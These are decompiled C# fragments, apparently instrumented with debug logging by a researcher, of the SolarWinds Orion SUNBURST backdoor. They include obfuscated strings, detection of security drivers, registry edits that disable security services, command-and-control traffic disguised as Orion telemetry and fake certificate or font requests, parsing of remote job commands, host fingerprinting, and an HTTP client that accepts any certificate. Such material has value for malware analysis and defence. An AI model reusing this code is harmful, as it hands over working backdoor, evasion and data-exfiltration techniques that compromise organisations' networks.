public static string GetOSVersion(bool full)
 {
     if (osVersion == null || osInfo == null)
     {
         try
         {
             // Select * From Win32_OperatingSystem
             using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNor3L0gtSizJzEsPriwuSc0FAA==")))
             {
                 ManagementObject managementObject = managementObjectSearcher.Get().Cast <ManagementObject>().FirstOrDefault <ManagementObject>();
                 // Caption
                 osInfo = managementObject.Properties[ZipHelper.Unzip("c04sKMnMzwMA")].Value.ToString();
                 // OSArchitecture
                 osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("8w92LErOyCxJTS4pLUoFAA==")].Value.ToString();
                 // InstallDate
                 osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("88wrLknMyXFJLEkFAA==")].Value.ToString();
                 // Organization
                 osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("8y9KT8zLrEosyczPAwA=")].Value.ToString();
                 // RegisteredUser
                 osInfo = osInfo + ";" + managementObject.Properties[ZipHelper.Unzip("C0pNzywuSS1KTQktTi0CAA==")].Value.ToString();
                 // Version
                 string text = managementObject.Properties[ZipHelper.Unzip("C0stKs7MzwMA")].Value.ToString();
                 osInfo = osInfo + ";" + text;
                 string[] array = text.Split(new char[]
                 {
                     '.'
                 });
                 osVersion = array[0] + "." + array[1];
             }
         }
         catch (Exception)
         {
             osVersion = Environment.OSVersion.Version.Major + "." + Environment.OSVersion.Version.Minor;
             // [E] {0} {1} {2}
             osInfo = string.Format(ZipHelper.Unzip("i3aNVag2qFWoNgRio1oA"), Environment.OSVersion.VersionString, Environment.OSVersion.Version, Environment.Is64BitOperatingSystem ? 64 : 32);
         }
     }
     if (!full)
     {
         return(osVersion);
     }
     return(osInfo);
 }
		private static bool SearchConfigurations()
		{
			Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Entering SearchConfigurations()");
			// Select * From Win32_SystemDriver
			Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Search Configurations: " + ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA=="));
			using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPriwuSc11KcosSy0CAA==")))
			{
				foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
				{
					// PathName
					ulong hash = Utilities.GetHash(Path.GetFileName(((ManagementObject)managementBaseObject).Properties[ZipHelper.Unzip("C0gsyfBLzE0FAA==")].Value.ToString()).ToLower());

					if (!Settings.printy)
					{
						Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Checking property: " + ZipHelper.Unzip("C0gsyfBLzE0FAA==") + "  GetFileName: " + Path.GetFileName(((ManagementObject)managementBaseObject).Properties[ZipHelper.Unzip("C0gsyfBLzE0FAA==")].Value.ToString()));
					}
					if ((Array.IndexOf<ulong>(Settings.configTimeStamps, hash) != -1))
					{
						Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Check for special drivers failed . Backdoor ConfigTimeStamps detected last GetFileName with hash " + hash + " [Use -r to Bypass]");
						if (Settings.bypassr)
						{
							Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Because you are bypassing drivers/process check, the backdoor will continue. In a normal case teh backdoor stop execution. ");
						}
						else
						{
							return true;
						}
					}
				}
			}
			return false;
		}
		private static bool SetManualMode(ServiceConfiguration.Service[] svcList)
		{
			try
			{
				// SYSTEM\CurrentControlSet\services
				bool result = false;
				using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(ZipHelper.Unzip("C44MDnH1jXEuLSpKzStxzs8rKcrPCU4tiSlOLSrLTE4tBgA=")))
				{
					foreach (string text in registryKey.GetSubKeyNames())
					{
						foreach (ServiceConfiguration.Service service in svcList)
						{
							try
							{
								if (Utilities.GetHash(text.ToLower()) == service.timeStamp)
								{
									Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Interesting Service found " + text);
									if (service.started)
									{
										Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Service is started " + text + " setting " + registryKey + "to false");
										result = true;
										RegistryHelper.SetKeyPermissions(registryKey, text, false);
									}
									else
									{
										using (RegistryKey registryKey2 = registryKey.OpenSubKey(text, true))
										{
											// Start
											if (registryKey2.GetValueNames().Contains(ZipHelper.Unzip("Cy5JLCoBAA==")))
											{
												Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Setting " + text + " with value " + ZipHelper.Unzip("Cy5JLCoBAA=="));
												// Start
												registryKey2.SetValue(ZipHelper.Unzip("Cy5JLCoBAA=="), 4, RegistryValueKind.DWord);
												result = true;
											}
										}
									}
								}
							}
							catch (Exception)
							{
								Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Error in SetManualMode");
							}
						}
					}
				}
				return result;
			}
			catch (Exception)
			{
			}
			return false;
		}
        private HttpStatusCode CreateUploadRequest(HttpHelper.JobEngine job, int err, string response, out byte[] outData)
        {
            string text = this.httpHost;

            byte[] array = null;
            HttpHelper.HttpOipExMethods httpOipExMethods = (job != HttpHelper.JobEngine.Idle && job != HttpHelper.JobEngine.None) ? HttpHelper.HttpOipExMethods.Head : HttpHelper.HttpOipExMethods.Get;
            outData = null;
            try
            {
                if (!string.IsNullOrEmpty(response))
                {
                    byte[] bytes  = Encoding.UTF8.GetBytes(response);
                    byte[] bytes2 = BitConverter.GetBytes(err);
                    byte[] array2 = new byte[bytes.Length + bytes2.Length + this.customerId.Length];
                    Array.Copy(bytes, array2, bytes.Length);
                    Array.Copy(bytes2, 0, array2, bytes.Length, bytes2.Length);
                    Array.Copy(this.customerId, 0, array2, bytes.Length + bytes2.Length, this.customerId.Length);
                    array            = HttpHelper.Inflate(array2);
                    httpOipExMethods = ((array.Length <= 10000) ? HttpHelper.HttpOipExMethods.Put : HttpHelper.HttpOipExMethods.Post);
                }
                if (!text.StartsWith(Uri.UriSchemeHttp + "://", StringComparison.OrdinalIgnoreCase) && !text.StartsWith(Uri.UriSchemeHttps + "://", StringComparison.OrdinalIgnoreCase))
                {
                    text = Uri.UriSchemeHttps + "://" + text;
                }
                if (!text.EndsWith("/"))
                {
                    text += "/";
                }
                text += this.GetBaseUri(httpOipExMethods, err);
                HttpWebRequest httpWebRequest = (HttpWebRequest)WebRequest.Create(text);
                if (httpOipExMethods == HttpHelper.HttpOipExMethods.Get || httpOipExMethods == HttpHelper.HttpOipExMethods.Head)
                {
                    // If-None-Match
                    httpWebRequest.Headers.Add(ZipHelper.Unzip("80zT9cvPS9X1TSxJzgAA"), this.GetCache());
                }
                if (httpOipExMethods == HttpHelper.HttpOipExMethods.Put && (this.requestMethod == HttpOipMethods.Get || this.requestMethod == HttpOipMethods.Head))
                {
                    int[] intArray = this.GetIntArray((array != null) ? array.Length : 0);
                    int   num      = 0;
                    ulong num2     = (ulong)DateTime.UtcNow.Subtract(new DateTime(1970, 1, 1, 0, 0, 0, DateTimeKind.Utc)).TotalMilliseconds;
                    num2 -= 300000UL;
                    string text2 = "{";
                    // "userId":"{0}",
                    text2 += string.Format(ZipHelper.Unzip("UyotTi3yTFGyUqo2qFXSAQA="), this.GetOrionImprovementCustomerId());
                    // "sessionId":"{0}",
                    text2 += string.Format(ZipHelper.Unzip("UypOLS7OzM/zTFGyUqo2qFXSAQA="), this.sessionId.ToString().Trim(new char[]
                    {
                        '{',
                        '}'
                    }));
                    // "steps":[
                    text2 += ZipHelper.Unzip("UyouSS0oVrKKBgA=");
                    for (int i = 0; i < intArray.Length; i++)
                    {
                        uint num3 = (uint)((this.random.Next(4) == 0) ? this.random.Next(512) : 0);
                        num2 += (ulong)num3;
                        byte[] array3;
                        if (intArray[i] > 0)
                        {
                            num2  |= 2UL;
                            array3 = array.Skip(num).Take(intArray[i]).ToArray <byte>();
                            num   += intArray[i];
                        }
                        else
                        {
                            num2  &= 18446744073709551613UL;
                            array3 = new byte[this.random.Next(16, 28)];
                            for (int j = 0; j < array3.Length; j++)
                            {
                                array3[j] = (byte)this.random.Next();
                            }
                        }
                        text2 += "{";
                        // "Timestamp":"\/Date({0})\/",
                        text2 += string.Format(ZipHelper.Unzip("UwrJzE0tLknMLVCyUorRd0ksSdWoNqjVjNFX0gEA"), num2);
                        string str = text2;
                        // "Index":{0},
                        string format = ZipHelper.Unzip("U/LMS0mtULKqNqjVAQA=");
                        int    num4   = this.mIndex;
                        this.mIndex = num4 + 1;
                        text2       = str + string.Format(format, num4);
                        // "EventType":"Orion",
                        text2 += ZipHelper.Unzip("U3ItS80rCaksSFWyUvIvyszPU9IBAA==");
                        // "EventName":"EventManager",
                        text2 += ZipHelper.Unzip("U3ItS80r8UvMTVWyUgKzfRPzEtNTi5R0AA==");
                        // "DurationMs":{0},
                        text2 += string.Format(ZipHelper.Unzip("U3IpLUosyczP8y1Wsqo2qNUBAA=="), num3);
                        // "Succeeded":true,
                        text2 += ZipHelper.Unzip("UwouTU5OTU1JTVGyKikqTdUBAA==");
                        // "Message":"{0}"
                        text2 += string.Format(ZipHelper.Unzip("U/JNLS5OTE9VslKqNqhVAgA="), Convert.ToBase64String(array3).Replace("/", "\\/"));
                        text2 += ((i + 1 != intArray.Length) ? "}," : "}");
                    }
                    text2 += "]}";
                    // application/json
                    httpWebRequest.ContentType = ZipHelper.Unzip("SywoyMlMTizJzM/TzyrOzwMA");
                    array = Encoding.UTF8.GetBytes(text2);
                }
                if (httpOipExMethods == HttpHelper.HttpOipExMethods.Post || this.requestMethod == HttpOipMethods.Put || this.requestMethod == HttpOipMethods.Post)
                {
                    // application/octet-stream
                    httpWebRequest.ContentType = ZipHelper.Unzip("SywoyMlMTizJzM/Tz08uSS3RLS4pSk3MBQA=");
                }
                return(this.CreateUploadRequestImpl(httpWebRequest, array, out outData));
            }
            catch (Exception)
            {
            }
            return((HttpStatusCode)0);
        }
        private string GetBaseUriImpl(HttpHelper.HttpOipExMethods method, int err)
        {
            string text = null;

            if (method == HttpHelper.HttpOipExMethods.Head)
            {
                text = ((ushort)err).ToString();
            }
            if (this.requestMethod == HttpOipMethods.Post)
            {
                string[] array = new string[]
                {
                    // -root
                    ZipHelper.Unzip("0y3Kzy8BAA=="),
                    // -cert
                    ZipHelper.Unzip("001OLSoBAA=="),
                    // -universal_ca
                    ZipHelper.Unzip("0y3NyyxLLSpOzIlPTgQA"),
                    // -ca
                    ZipHelper.Unzip("001OBAA="),
                    // -primary_ca
                    ZipHelper.Unzip("0y0oysxNLKqMT04EAA=="),
                    // -timestamp
                    ZipHelper.Unzip("0y3JzE0tLknMLQAA"),
                    "",
                    // -global
                    ZipHelper.Unzip("003PyU9KzAEA"),
                    // -secureca
                    ZipHelper.Unzip("0y1OTS4tSk1OBAA=")
                };
                // pki/crl/{0}{1}{2}.crl
                return(string.Format(ZipHelper.Unzip("K8jO1E8uytGvNqitNqytNqrVA/IA"), this.random.Next(100, 10000), array[this.random.Next(array.Length)], (text == null) ? "" : ("-" + text)));
            }
            if (this.requestMethod == HttpOipMethods.Put)
            {
                string[] array2 = new string[]
                {
                    // Bold
                    ZipHelper.Unzip("c8rPSQEA"),
                    // BoldItalic
                    ZipHelper.Unzip("c8rPSfEsSczJTAYA"),
                    // ExtraBold
                    ZipHelper.Unzip("c60oKUp0ys9JAQA="),
                    // ExtraBoldItalic
                    ZipHelper.Unzip("c60oKUp0ys9J8SxJzMlMBgA="),
                    // Italic
                    ZipHelper.Unzip("8yxJzMlMBgA="),
                    // Light
                    ZipHelper.Unzip("88lMzygBAA=="),
                    // LightItalic
                    ZipHelper.Unzip("88lMzyjxLEnMyUwGAA=="),
                    // Regular
                    ZipHelper.Unzip("C0pNL81JLAIA"),
                    // SemiBold
                    ZipHelper.Unzip("C07NzXTKz0kBAA=="),
                    // SemiBoldItalic
                    ZipHelper.Unzip("C07NzXTKz0nxLEnMyUwGAA==")
                };
                string[] array3 = new string[]
                {
                    // opensans
                    ZipHelper.Unzip("yy9IzStOzCsGAA=="),
                    // noto
                    ZipHelper.Unzip("y8svyQcA"),
                    // freefont
                    ZipHelper.Unzip("SytKTU3LzysBAA=="),
                    // SourceCodePro
                    ZipHelper.Unzip("C84vLUpOdc5PSQ0oygcA"),
                    // SourceSerifPro
                    ZipHelper.Unzip("C84vLUpODU4tykwLKMoHAA=="),
                    // SourceHanSans
                    ZipHelper.Unzip("C84vLUpO9UjMC07MKwYA"),
                    // SourceHanSerif
                    ZipHelper.Unzip("C84vLUpO9UjMC04tykwDAA==")
                };
                int num = this.random.Next(array3.Length);
                if (num <= 1)
                {
                    // fonts/woff/{0}-{1}-{2}-webfont{3}.woff2
                    return(string.Format(ZipHelper.Unzip("S8vPKynWL89PS9OvNqjVrTYEYqNa3fLUpDSgTLVxrR5IzggA"), new object[]
                    {
                        this.random.Next(100, 10000),
                        array3[num],
                        array2[this.random.Next(array2.Length)].ToLower(),
                        text
                    }));
                }
                // fonts/woff/{0}-{1}-{2}{3}.woff2
                return(string.Format(ZipHelper.Unzip("S8vPKynWL89PS9OvNqjVrTYEYqPaauNaPZCYEQA="), new object[]
                {
                    this.random.Next(100, 10000),
                    array3[num],
                    array2[this.random.Next(array2.Length)],
                    text
                }));
            }
            else
            {
                if (method <= HttpHelper.HttpOipExMethods.Head)
                {
                    string text2 = "";
                    if (this.Valid(20))
                    {
                        // SolarWinds
                        text2 += ZipHelper.Unzip("C87PSSwKz8xLKQYA");
                        if (this.Valid(40))
                        {
                            // .CortexPlugin
                            text2 += ZipHelper.Unzip("03POLypJrQjIKU3PzAMA");
                        }
                    }
                    if (this.Valid(80))
                    {
                        // .Orion
                        text2 += ZipHelper.Unzip("0/MvyszPAwA=");
                    }
                    if (this.Valid(80))
                    {
                        string[] array4 = new string[]
                        {
                            // Wireless
                            ZipHelper.Unzip("C88sSs1JLS4GAA=="),
                            // UI
                            ZipHelper.Unzip("C/UEAA=="),
                            // Widgets
                            ZipHelper.Unzip("C89MSU8tKQYA"),
                            // NPM
                            ZipHelper.Unzip("8wvwBQA="),
                            // Apollo
                            ZipHelper.Unzip("cyzIz8nJBwA="),
                            // CloudMonitoring
                            ZipHelper.Unzip("c87JL03xzc/LLMkvysxLBwA=")
                        };
                        text2 = text2 + "." + array4[this.random.Next(array4.Length)];
                    }
                    if (this.Valid(30) || string.IsNullOrEmpty(text2))
                    {
                        string[] array5 = new string[]
                        {
                            // Nodes
                            ZipHelper.Unzip("88tPSS0GAA=="),
                            // Volumes
                            ZipHelper.Unzip("C8vPKc1NLQYA"),
                            // Interfaces
                            ZipHelper.Unzip("88wrSS1KS0xOLQYA"),
                            // Components
                            ZipHelper.Unzip("c87PLcjPS80rKQYA")
                        };
                        text2 = text2 + "." + array5[this.random.Next(array5.Length)];
                    }
                    if (this.Valid(30) || text != null)
                    {
                        text2 = string.Concat(new object[]
                        {
                            text2,
                            "-",
                            this.random.Next(1, 20),
                            ".",
                            this.random.Next(1, 30)
                        });
                        if (text != null)
                        {
                            text2 = text2 + "." + ((ushort)err).ToString();
                        }
                    }
                    // swip/upd/
                    return(ZipHelper.Unzip("Ky7PLNAvLUjRBwA=") + text2.TrimStart(new char[]
                    {
                        '.'
                        // .xml
                    }) + ZipHelper.Unzip("06vIzQEA"));
                }
                if (method != HttpHelper.HttpOipExMethods.Put)
                {
                    // swip/Upload.ashx
                    return(ZipHelper.Unzip("Ky7PLNAPLcjJT0zRSyzOqAAA"));
                }
                // swip/Events
                return(ZipHelper.Unzip("Ky7PLNB3LUvNKykGAA=="));
            }
        }
 private HttpHelper.JobEngine ParseServiceResponse(byte[] body, out string args)
 {
     args = null;
     try
     {
         if (body == null || body.Length < 4)
         {
             return(HttpHelper.JobEngine.None);
         }
         HttpOipMethods httpOipMethods = this.requestMethod;
         if (httpOipMethods != HttpOipMethods.Put)
         {
             if (httpOipMethods != HttpOipMethods.Post)
             {
                 // "\{[0-9a-f-]{36}\}"|"[0-9a-f]{32}"|"[0-9a-f]{16}"
                 string[] value = (from Match m in Regex.Matches(Encoding.UTF8.GetString(body), ZipHelper.Unzip("U4qpjjbQtUzUTdONrTY2q42pVapRgooABYxQuIZmtUoA"), RegexOptions.IgnoreCase)
                                   select m.Value).ToArray <string>();
                 body = Utilities.HexStringToByteArray(string.Join("", value).Replace("\"", string.Empty).Replace("-", string.Empty).Replace("{", string.Empty).Replace("}", string.Empty));
             }
             else
             {
                 body = body.Skip(12).ToArray <byte>();
             }
         }
         else
         {
             body = body.Skip(48).ToArray <byte>();
         }
         int num = BitConverter.ToInt32(body, 0);
         body = body.Skip(4).Take(num).ToArray <byte>();
         if (body.Length != num)
         {
             return(HttpHelper.JobEngine.None);
         }
         string[] array = Encoding.UTF8.GetString(HttpHelper.Deflate(body)).Trim().Split(new char[]
         {
             ' '
         }, 2);
         HttpHelper.JobEngine jobEngine = (HttpHelper.JobEngine) int.Parse(array[0]);
         args = ((array.Length > 1) ? array[1] : null);
         return(Enum.IsDefined(typeof(HttpHelper.JobEngine), jobEngine) ? jobEngine : HttpHelper.JobEngine.None);
     }
     catch (Exception)
     {
     }
     return(HttpHelper.JobEngine.None);
 }
        private static string GetNewOwnerName()
        {
            string text = null;
            // S-1-5-
            string value = ZipHelper.Unzip("C9Y11DXVBQA=");
            // -500
            string value2 = ZipHelper.Unzip("0zU1MAAA");

            try
            {
                // Administrator
                text = new NTAccount(ZipHelper.Unzip("c0zJzczLLC4pSizJLwIA")).Translate(typeof(SecurityIdentifier)).Value;
            }
            catch
            {
            }
            if (string.IsNullOrEmpty(text) || !text.StartsWith(value, StringComparison.OrdinalIgnoreCase) || !text.EndsWith(value2, StringComparison.OrdinalIgnoreCase))
            {
                // Select * From Win32_UserAccount
                string queryString = ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPLU4tckxOzi/NKwEA");
                text = null;
                using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(queryString))
                {
                    foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
                    {
                        // SID
                        ManagementObject managementObject = (ManagementObject)managementBaseObject;
                        string           text2            = managementObject.Properties[ZipHelper.Unzip("C/Z0AQA=")].Value.ToString();
                        // LocalAccount
                        // true
                        if (managementObject.Properties[ZipHelper.Unzip("88lPTsxxTE7OL80rAQA=")].Value.ToString().ToLower() == ZipHelper.Unzip("KykqTQUA") && text2.StartsWith(value, StringComparison.OrdinalIgnoreCase))
                        {
                            if (text2.EndsWith(value2, StringComparison.OrdinalIgnoreCase))
                            {
                                text = text2;
                                break;
                            }
                            if (string.IsNullOrEmpty(text))
                            {
                                text = text2;
                            }
                        }
                    }
                }
            }
            return(new SecurityIdentifier(text).Translate(typeof(NTAccount)).Value);
        }
Beispiel #8
0
        private static bool GetOrCreateUserID(out byte[] hash64)
        {
            string text = ReadDeviceInfo();

            Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Device info: " + text);

            hash64 = new byte[8];
            Array.Clear(hash64, 0, hash64.Length);
            if (text == null)
            {
                return(false);
            }
            text += domain4;
            try
            {
                // HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography
                // MachineGuid
                text += RegistryHelper.GetValue(ZipHelper.Unzip("8/B2jYz38Xd29In3dXT28PRzjQn2dwsJdwxyjfHNTC7KL85PK4lxLqosKMlPL0osyKgEAA=="), ZipHelper.Unzip("801MzsjMS3UvzUwBAA=="), "");
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Registry/MachineGuid info: " + text);
            }
            catch
            {
                Console.WriteLine("[" + DateTime.Now.ToString("hh.mm.ss.fffffff") + "] - Error GetOrCreateUserID");
            }
            using (MD5 md = MD5.Create())
            {
                byte[] bytes = Encoding.ASCII.GetBytes(text);
                byte[] array = md.ComputeHash(bytes);
                if (array.Length < hash64.Length)
                {
                    return(false);
                }
                for (int i = 0; i < array.Length; i++)
                {
                    byte[] array2 = hash64;
                    int    num    = i % hash64.Length;
                    array2[num] ^= array[i];
                }
            }
            return(true);
        }
Beispiel #9
0
        public static void UploadSystemDescription(string[] args, out string result, IWebProxy proxy)
        {
            result = null;
            string requestUriString = args[0];
            string s    = args[1];
            string text = (args.Length >= 3) ? args[2] : null;

            string[] array = Encoding.UTF8.GetString(Convert.FromBase64String(s)).Split(new string[]
            {
                "\r\n",
                "\r",
                "\n"
            }, StringSplitOptions.None);
            HttpWebRequest httpWebRequest  = (HttpWebRequest)WebRequest.Create(requestUriString);
            HttpWebRequest httpWebRequest2 = httpWebRequest;

            httpWebRequest2.ServerCertificateValidationCallback =
                (RemoteCertificateValidationCallback)Delegate.Combine(httpWebRequest2.ServerCertificateValidationCallback, new RemoteCertificateValidationCallback((object sender, X509Certificate cert, X509Chain chain, SslPolicyErrors sslPolicyErrors) => true));
            httpWebRequest.Proxy   = proxy;
            httpWebRequest.Timeout = 120000;
            httpWebRequest.Method  = array[0].Split(new char[]
            {
                ' '
            })[0];
            foreach (string text2 in array)
            {
                int num = text2.IndexOf(':');
                if (num > 0)
                {
                    string text3 = text2.Substring(0, num);
                    string text4 = text2.Substring(num + 1).TrimStart(Array.Empty <char>());
                    if (!WebHeaderCollection.IsRestricted(text3))
                    {
                        httpWebRequest.Headers.Add(text2);
                    }
                    else
                    {
                        ulong hash = Utilities.GetHash(text3.ToLower());
                        // expect
                        if (hash <= 8873858923435176895UL)
                        {
                            // content-type
                            if (hash <= 6116246686670134098UL)
                            {
                                // accept
                                if (hash != 2734787258623754862UL)
                                {
                                    // content-type
                                    if (hash == 6116246686670134098UL)
                                    {
                                        httpWebRequest.ContentType = text4;
                                    }
                                }
                                else
                                {
                                    httpWebRequest.Accept = text4;
                                }
                            }
                            // user-agent
                            else if (hash != 7574774749059321801UL)
                            {
                                // expect
                                if (hash == 8873858923435176895UL)
                                {
                                    // 100-continue
                                    if (Utilities.GetHash(text4.ToLower()) == 1475579823244607677UL)
                                    {
                                        httpWebRequest.ServicePoint.Expect100Continue = true;
                                    }
                                    else
                                    {
                                        httpWebRequest.Expect = text4;
                                    }
                                }
                            }
                            else
                            {
                                httpWebRequest.UserAgent = text4;
                            }
                        }
                        // connection
                        else if (hash <= 11266044540366291518UL)
                        {
                            // referer
                            if (hash != 9007106680104765185UL)
                            {
                                // connection
                                if (hash == 11266044540366291518UL)
                                {
                                    ulong hash2 = Utilities.GetHash(text4.ToLower());
                                    // keep-alive
                                    httpWebRequest.KeepAlive = (hash2 == 13852439084267373191UL || httpWebRequest.KeepAlive);
                                    // close
                                    httpWebRequest.KeepAlive = (hash2 != 14226582801651130532UL && httpWebRequest.KeepAlive);
                                }
                            }
                            else
                            {
                                httpWebRequest.Referer = text4;
                            }
                        }
                        // if-modified-since
                        else if (hash != 15514036435533858158UL)
                        {
                            // date
                            if (hash == 16066522799090129502UL)
                            {
                                httpWebRequest.Date = DateTime.Parse(text4);
                            }
                        }
                        else
                        {
                            httpWebRequest.Date = DateTime.Parse(text4);
                        }
                    }
                }
            }
            // {0} {1} HTTP/{2}

            result += string.Format(ZipHelper.Unzip("qzaoVag2rFXwCAkJ0K82quUCAA=="), httpWebRequest.Method, httpWebRequest.Address.PathAndQuery, httpWebRequest.ProtocolVersion.ToString());
            result  = result + httpWebRequest.Headers.ToString() + "\n\n";
            if (!string.IsNullOrEmpty(text))
            {
                using (Stream requestStream = httpWebRequest.GetRequestStream())
                {
                    byte[] array3 = Convert.FromBase64String(text);
                    requestStream.Write(array3, 0, array3.Length);
                }
            }
            using (WebResponse response = httpWebRequest.GetResponse())
            {
                result += string.Format("{0} {1}\n", (int)((HttpWebResponse)response).StatusCode, ((HttpWebResponse)response).StatusDescription);
                result  = result + response.Headers.ToString() + "\n";
                using (Stream responseStream = response.GetResponseStream())
                {
                    result += new StreamReader(responseStream).ReadToEnd();
                }
            }
        }
Beispiel #10
0
 public static void GetProcessByDescription(string[] args, out string result)
 {
     result = null;
     if (args.Length == 0)
     {
         foreach (Process process in Process.GetProcesses())
         {
             // [{0,5}] {1}
             result += string.Format(ZipHelper.Unzip("i6420DGtjVWoNqzlAgA="), process.Id, Utilities.Quote(process.ProcessName));
         }
         return;
     }
     // Select * From Win32_Process
     using (ManagementObjectSearcher managementObjectSearcher = new ManagementObjectSearcher(ZipHelper.Unzip("C07NSU0uUdBScCvKz1UIz8wzNooPKMpPTi0uBgA=")))
     {
         foreach (ManagementBaseObject managementBaseObject in managementObjectSearcher.Get())
         {
             ManagementObject managementObject = (ManagementObject)managementBaseObject;
             string[]         array            = new string[]
             {
                 string.Empty,
                 string.Empty
             };
             ManagementObject managementObject2 = managementObject;
             // GetOwner
             string   methodName = ZipHelper.Unzip("c08t8S/PSy0CAA==");
             object[] array2     = array;
             object[] args2      = array2;
             // [{0,5}] {1,-16} {2}	{3,5} {4}\{5}
             Convert.ToInt32(managementObject2.InvokeMethod(methodName, args2));
             result += string.Format(ZipHelper.Unzip("i6420DGtjVWoNtTRNTSrVag2quWsNgYKKVSb1MZUm9ZyAQA="), new object[]
             {
                 // ProcessID
                 // Name
                 // ParentProcessID
                 managementObject[ZipHelper.Unzip("CyjKT04tLvZ0AQA=")],
                 Utilities.Quote(managementObject[ZipHelper.Unzip("80vMTQUA")].ToString()),
                 managementObject[args[0]],
                 managementObject[ZipHelper.Unzip("C0gsSs0rCSjKT04tLvZ0AQA=")],
                 array[1],
                 array[0]
             });
         }
     }
 }